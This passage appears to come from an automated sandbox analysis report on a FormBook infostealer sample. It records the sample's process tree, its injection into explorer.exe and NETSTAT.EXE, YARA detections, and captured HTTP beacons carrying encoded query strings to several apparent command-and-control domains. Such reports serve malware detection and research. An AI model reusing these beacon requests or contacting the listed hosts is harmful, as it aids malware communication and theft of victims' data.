                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    2192.168.2.3497423.13.255.15780C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Apr 8, 2021 10:49:51.877827883 CEST5738OUTGET /vu9b/?uZQL2=D48x&0pn=4FRBZlZfmJP1ouB3qG1kZTmIcoiAlBFvqheXtdIBznGFOOcTf1arb+p8J++3khIBMjQo HTTP/1.1
                                                                                    Host: www.pone2.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Apr 8, 2021 10:49:51.988156080 CEST5739INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 08 Apr 2021 08:49:51 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 153
                                                                                    Connection: close
                                                                                    Server: nginx/1.16.1
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    3192.168.2.349743208.91.197.9180C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Apr 8, 2021 10:49:57.294074059 CEST5739OUTGET /vu9b/?0pn=gvDMKnL2DiygUqkLOW8equ0SBtiZsQsp9RF77GdE0oWtaZL2dcC9ipMcSo2LbyxlKRwH&uZQL2=D48x HTTP/1.1
                                                                                    Host: www.newmandu.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Apr 8, 2021 10:49:57.479624987 CEST5741INHTTP/1.1 200 OK
                                                                                    Date: Thu, 08 Apr 2021 08:49:57 GMT
                                                                                    Server: Apache
                                                                                    Set-Cookie: vsid=928vr3654173974123123; expires=Tue, 07-Apr-2026 08:49:57 GMT; Max-Age=157680000; path=/; domain=www.newmandu.com; HttpOnly
                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_BkrQvPC8sk24uvc+Nn9tqdRZgLCRUlnQZz65yc0bqXefVa5ctkyyuEEjbRhEn+bFORz0PyYM6ecDwqWw1JjvNg==
                                                                                    Content-Length: 2512
                                                                                    Keep-Alive: timeout=5, max=127
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Data Raw: 3c 21 2d 2d 0d 0a 09 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 65 77 6d 61 6e 64 75 2e 63 6f 6d 2f 3f 66 70 3d 74 65 52 43 47 42 52 57 6e 73 4d 79 51 50 59 42 4c 51 7a 49 54 50 25 32 46 52 5a 68 52 4d 25 32 42 7a 52 56 6b 48 59 36 6c 4b 4f 44 6f 78 57 39 55 42 46 42 5a 25 32 42 41 55 54 6a 4a 42 44 55 34 49 6f 73 67 61 51 70 5a 78 44 4b 68 70 34 65 59 54 64 75 30 6a 78 48 32 6d 71 50 4a 51 42 69 56 39 31 68 66 70 38 4c 75 48 50 77 6a 7a 37 6d 57 37 56 4f 6b 67 6e 30 54 38 52 73 31 68 72 6f 44 63 4a 43 68 33 69 77 4c 70 6d 58 44 6d 50 4d 73 6b 43 50 39 36 58 6b 6a 6d 64 41 62 45 54 65 34 56 79 30 4f 71 41 49 77 5a 79 4d 7a 4c 57 7a 30 25 33 44 26 70 72 76 74 6f 66 3d 4f 25 32 42 35 56 4e 25 32 42 44 49 25 32 42 68 38 70 38 54 7a 50 72 5a 6d 48 61 56 33 70 41 44 4c 72 65 67 76 37 33 56 5a 38 5a 41 38 6d 53 43 63 25 33 44 26 70 6f 72 75 3d 68 75 6c 4f 30 54 52 6f 6a 68 78 55 4f 48 79 51 42 6a 75 59 42 44 6c 43 31 42 6c 74 38 4e 46 69 70 30 66 75 5a 42 51 4a 48 4a 43 67 67 4e 4e 62 67 4a 76 30 44 41 36 33 79 67 74 46 75 59 75 69 41 6b 6c 75 71 6d 43 4d 4e 64 66 72 46 42 78 43 34 43 34 66 45 46 62 68 72 43 52 37 37 56 33 4d 67 4b 68 79 71 41 74 6c 6b 4f 45 35 6d 36 66 32 76 71 68 42 78 6f 37 6e 38 68 44 32 47 34 62 50 39 5a 45 67 55 59 51 57 65 79 31 6a 6b 6d 50 45 55 67 49 4a 38 74 6b 65 41 32 53 6c 56 25 32 46 49 35 58 25 32 42 6e 44 43 42 45 67 48 6c 6b 62 79 64 4b 52 65 59 76 50 46 6e 25 32 46 57 4f 47 59 52 64 58 64 74 26 63 69 66 72 3d 31 26 30 70 6e 3d 67 76 44 4d 4b 6e 4c 32 44 69 79 67 55 71 6b 4c 4f 57 38 65 71 75 30 53 42 74 69 5a 73 51 73 70 39 52 46 37 37 47 64 45 30 6f 57 74 61 5a 4c 32 64 63 43 39 69 70 4d 63 53 6f 32 4c 62 79 78 6c 4b 52 77 48 26 75 5a 51 4c 32 3d 44 34 38 78 22 3b 0d 0a 09 2f 2a 0d 0a 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 42 6b 72 51 76 50 43 38 73 6b 32 34 75 76 63
                                                                                    Data Ascii: ...top.location="http://www.newmandu.com/?fp=teRCGBRWnsMyQPYBLQzITP%2FRZhRM%2BzRVkHY6lKODoxW9UBFBZ%2BAUTjJBDU4IosgaQpZxDKhp4eYTdu0jxH2mqPJQBiV91hfp8LuHPwjz7mW7VOkgn0T8Rs1hroDcJCh3iwLpmXDmPMskCP96XkjmdAbETe4Vy0OqAIwZyMzLWz0%3D&prvtof=O%2B5VN%2BDI%2Bh8p8TzPrZmHaV3pADLregv73VZ8ZA8mSCc%3D&poru=hulO0TRojhxUOHyQBjuYBDlC1Blt8NFip0fuZBQJHJCggNNbgJv0DA63ygtFuYuiAkluqmCMNdfrFBxC4C4fEFbhrCR77V3MgKhyqAtlkOE5m6f2vqhBxo7n8hD2G4bP9ZEgUYQWey1jkmPEUgIJ8tkeA2SlV%2FI5X%2BnDCBEgHlkbydKReYvPFn%2FWOGYRdXdt&cifr=1&0pn=gvDMKnL2DiygUqkLOW8equ0SBtiZsQsp9RF77GdE0oWtaZL2dcC9ipMcSo2LbyxlKRwH&uZQL2=D48x";/*--><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_BkrQvPC8sk24uvc


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    4192.168.2.349744152.44.33.19380C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Apr 8, 2021 10:50:02.737376928 CEST5744OUTGET /vu9b/?uZQL2=D48x&0pn=Ucm1yDKmPu3sqYnPT23C7jNgC5pC+S3WITJgysPBW6tpfdLYpWyQ+yZVED0YNT4HHiqT HTTP/1.1
                                                                                    Host: www.bestwishesforyou.online
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Apr 8, 2021 10:50:02.848124027 CEST5745INHTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 707
                                                                                    Date: Thu, 08 Apr 2021 08:49:59 GMT
                                                                                    Location: https://www.bestwishesforyou.online/vu9b/?uZQL2=D48x&0pn=Ucm1yDKmPu3sqYnPT23C7jNgC5pC+S3WITJgysPBW6tpfdLYpWyQ+yZVED0YNT4HHiqT
                                                                                    Vary: Accept-Encoding
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    5192.168.2.34974534.102.136.18080C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Apr 8, 2021 10:50:07.928015947 CEST5746OUTGET /vu9b/?0pn=ZRZicPUHGdpu447/ToshtXbk+LjFT6TcRbqWThirrcjgIxqMd1CJhqCrqkTzpGUGM9/e&uZQL2=D48x HTTP/1.1
                                                                                    Host: www.unclejoeandkamala2020.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Apr 8, 2021 10:50:08.043180943 CEST5747INHTTP/1.1 403 Forbidden
                                                                                    Server: openresty
                                                                                    Date: Thu, 08 Apr 2021 08:50:07 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 275
                                                                                    ETag: "6061898c-113"
                                                                                    Via: 1.1 google
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    6192.168.2.34974634.102.136.18080C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Apr 8, 2021 10:50:13.109869957 CEST5748OUTGET /vu9b/?uZQL2=D48x&0pn=XOyfHYtLU1lLdZnaXZe4OvPQMiRanaHMlAIcsSmWFWkLxOIqqTB9rasY28K6kY36/QRI HTTP/1.1
                                                                                    Host: www.siloamtree.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Apr 8, 2021 10:50:13.227869034 CEST5748INHTTP/1.1 403 Forbidden
                                                                                    Server: openresty
                                                                                    Date: Thu, 08 Apr 2021 08:50:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 275
                                                                                    ETag: "6063a886-113"
                                                                                    Via: 1.1 google
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                    Code Manipulations

                                                                                    Statistics

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Start time:10:48:02
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\Desktop\8sxgohtHjM.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\8sxgohtHjM.exe'
                                                                                    Imagebase:0x3b0000
                                                                                    File size:585728 bytes
                                                                                    MD5 hash:D381B0A2268051AA83B031DDC87EE7DF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.270742230.0000000002713000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.271249729.00000000037C5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.271249729.00000000037C5000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.271249729.00000000037C5000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:10:48:10
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\Desktop\8sxgohtHjM.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\Desktop\8sxgohtHjM.exe
                                                                                    Imagebase:0x2c0000
                                                                                    File size:585728 bytes
                                                                                    MD5 hash:D381B0A2268051AA83B031DDC87EE7DF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:10:48:11
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\Desktop\8sxgohtHjM.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\8sxgohtHjM.exe
                                                                                    Imagebase:0x6e0000
                                                                                    File size:585728 bytes
                                                                                    MD5 hash:D381B0A2268051AA83B031DDC87EE7DF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.311088720.0000000000D00000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.311088720.0000000000D00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.311088720.0000000000D00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.310623101.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.310623101.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.310623101.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.311156911.0000000001030000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.311156911.0000000001030000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.311156911.0000000001030000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:10:48:13
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\explorer.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:
                                                                                    Imagebase:0x7ff714890000
                                                                                    File size:3933184 bytes
                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:10:48:27
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                    Imagebase:0x1060000
                                                                                    File size:32768 bytes
                                                                                    MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.520943854.0000000003540000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.520943854.0000000003540000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.520943854.0000000003540000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.521004557.0000000003570000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.521004557.0000000003570000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.521004557.0000000003570000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.518608127.0000000000FD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.518608127.0000000000FD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.518608127.0000000000FD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:moderate

                                                                                    Disassembly

                                                                                    Code Analysis

                                                                                    Reset < >